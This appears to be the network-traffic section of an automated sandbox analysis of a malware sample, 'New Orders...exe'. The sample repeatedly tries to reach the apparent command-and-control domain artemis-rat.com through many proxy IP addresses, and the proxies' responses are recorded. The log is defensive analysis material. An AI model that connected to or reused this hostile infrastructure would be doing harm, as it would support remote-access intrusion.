                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        585192.168.2.951586174.75.211.22241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.155059099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        586192.168.2.95157598.162.25.29316797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.155062914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        587192.168.2.95158524.249.199.441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.157746077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        588192.168.2.95171323.95.209.142156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.160109043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        589192.168.2.951592203.74.125.1888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.164228916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        590192.168.2.9515878.211.4.215807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.179316998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.835639000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        591192.168.2.95159147.242.234.237807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.180984020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        592192.168.2.95170272.10.160.90210117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.181189060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.195298910 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        593192.168.2.951510128.199.196.31388327672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.181435108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.945631027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.273427010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.664341927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.273293018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.976458073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.664012909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.773098946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.976325989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        594192.168.2.951544103.49.202.252807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.183579922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        595192.168.2.95174320.80.103.19331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.189409971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.739604950 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        596192.168.2.951788172.67.181.89807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.189692974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.344399929 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        597192.168.2.950988174.138.114.226807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.193326950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.273334980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.273742914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273725033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.273477077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.273225069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:30.273154974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:54.273169041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:42.273173094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        598192.168.2.95151865.1.244.23210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.196429968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.593517065 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        599192.168.2.951733146.19.106.217123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.196561098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        600192.168.2.951599154.12.178.107299857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.197500944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        601192.168.2.951810104.24.220.52807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.198400974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.352489948 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        602192.168.2.951574146.59.70.2961477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.274785995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        603192.168.2.951823172.67.105.234807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.275599957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.430612087 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        604192.168.2.949759162.214.90.49587407672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.277213097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.273334980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.273742914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273725033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.277343988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        605192.168.2.95160143.131.245.216156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.277612925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        606192.168.2.951552218.57.210.18690027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.277650118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.695626974 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 14:58:59 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        607192.168.2.951679190.242.125.18680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.278130054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.270255089 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        608192.168.2.951850188.114.99.171807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.278131962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.434237003 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        609192.168.2.951537116.199.168.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.278480053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
